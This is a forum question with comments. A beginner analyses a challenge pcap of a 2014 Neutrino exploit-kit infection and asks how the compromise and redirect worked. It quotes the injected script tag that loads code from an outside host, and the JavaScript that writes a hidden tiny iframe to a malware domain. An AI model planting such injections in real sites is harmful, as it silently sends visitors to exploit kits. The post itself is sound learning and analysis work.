# Adding a script tag after the html closing tag

Tags: web-application, malware, xss

I am still a beginner in web vulnerability. While I was browsing on the internet I saw a challenge inspired by a real life security crisis. We are given a pcap of a malware infection that was done in 2014 (Neutrino though adobe Flash).

Apparently a site `siteCompromised.com` was compromised so that it redirects people to another domain `siteHostingMalware.com` where the malware exists.

When I see the content of the root of `siteCompromised.com` I see:

```
<html>
  <body>

SOME HTML CODE

  </body>
</html><script type='text/javascript' src='http://anotherSite.com/link'></script>
```

Both `anotherSite.com` and `siteHostingMalware.com` are flagged by VirusTotal.

What I don't understand is:

1. How did adding the html script tag help the attacker redirecting automatically toward the other website hosting the malware ?
2. Why did the attacker redirect to `http://anotherSite.com/link` and not directly to the site hosting the malware ?
3. At that time, what may be the web vulnerability used by the attacker to compromise `siteCompromised.com` ? I think probably an XSS but not sure ...

As I am still a beginner do not hesitate to put some reference for me to read them later. Thank you.

EDIT: The content of `anotherSite.com/link` is :

```
document.write(("<iframe src='http://siteHostingMalware.com' name='yBnYN' width=13 height=10 frameborder=0 marginheight=0 marginwidth=0 scrolling=no> </" + "iframe>"));
```

Comment: g'day and welcome - if possible, please add the file (aka. "resource") that gets loaded by the `<script>` tag (ie. the contents of the url `http://anotherSite.com/link`) - assuming your capture is complete, this will be a http transaction that occurred after the initial one to `siteCompromised.com`

Comment: @brynk I did that... Can the script actually be loaded even if it written after the closing html tag ? Also, if I understand correctly there is a frame that has been added... The user clicked on the frame for the redirection to occur, right ?